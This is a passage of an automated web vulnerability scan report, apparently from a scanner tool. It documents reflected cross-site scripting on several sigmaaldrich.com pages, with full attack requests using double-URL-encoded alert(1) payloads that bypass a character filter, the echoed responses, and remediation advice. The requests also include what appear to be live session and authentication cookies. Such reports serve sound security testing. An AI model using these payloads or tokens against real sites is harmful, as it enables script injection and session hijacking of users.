WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:45 GMT
Content-Length: 28922
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/materials-science/dda9b";alert(1)//fe8e88d2785","E404") ;
   </script>
...[SNIP]...

1.590. http://www.sigmaaldrich.com/materials-science/metal-and-ceramic-science.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /materials-science/metal-and-ceramic-science.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efeb4%2522%253balert%25281%2529%252f%252ff9c67401f90 was submitted in the REST URL parameter 1. This input was echoed as efeb4";alert(1)//f9c67401f90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /materials-scienceefeb4%2522%253balert%25281%2529%252f%252ff9c67401f90/metal-and-ceramic-science.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:43 GMT
Content-Length: 28952
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/materials-scienceefeb4";alert(1)//f9c67401f90/metal-and-ceramic-science.html","E404") ;
   </script>
...[SNIP]...

1.591. http://www.sigmaaldrich.com/materials-science/metal-and-ceramic-science.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /materials-science/metal-and-ceramic-science.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52dd3%2522%253balert%25281%2529%252f%252f97d6f88434a was submitted in the REST URL parameter 2. This input was echoed as 52dd3";alert(1)//97d6f88434a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /materials-science/52dd3%2522%253balert%25281%2529%252f%252f97d6f88434a HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:46 GMT
Content-Length: 28922
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/materials-science/52dd3";alert(1)//97d6f88434a","E404") ;
   </script>
...[SNIP]...

1.592. http://www.sigmaaldrich.com/materials-science/micro-and-nanoelectronics.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /materials-science/micro-and-nanoelectronics.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74b21%2522%253balert%25281%2529%252f%252f69dcd533ce2 was submitted in the REST URL parameter 1. This input was echoed as 74b21";alert(1)//69dcd533ce2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /materials-science74b21%2522%253balert%25281%2529%252f%252f69dcd533ce2/micro-and-nanoelectronics.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:45 GMT
Content-Length: 28952
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/materials-science74b21";alert(1)//69dcd533ce2/micro-and-nanoelectronics.html","E404") ;
   </script>
...[SNIP]...

1.593. http://www.sigmaaldrich.com/materials-science/micro-and-nanoelectronics.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /materials-science/micro-and-nanoelectronics.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d8b0%2522%253balert%25281%2529%252f%252f28e6eb265e0 was submitted in the REST URL parameter 2. This input was echoed as 9d8b0";alert(1)//28e6eb265e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /materials-science/9d8b0%2522%253balert%25281%2529%252f%252f28e6eb265e0 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:47 GMT
Content-Length: 28922
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/materials-science/9d8b0";alert(1)//28e6eb265e0","E404") ;
   </script>
...[SNIP]...

1.594. http://www.sigmaaldrich.com/materials-science/nanomaterials.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /materials-science/nanomaterials.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43b7f%2522%253balert%25281%2529%252f%252f55e6c486fe4 was submitted in the REST URL parameter 1. This input was echoed as 43b7f";alert(1)//55e6c486fe4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /materials-science43b7f%2522%253balert%25281%2529%252f%252f55e6c486fe4/nanomaterials.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 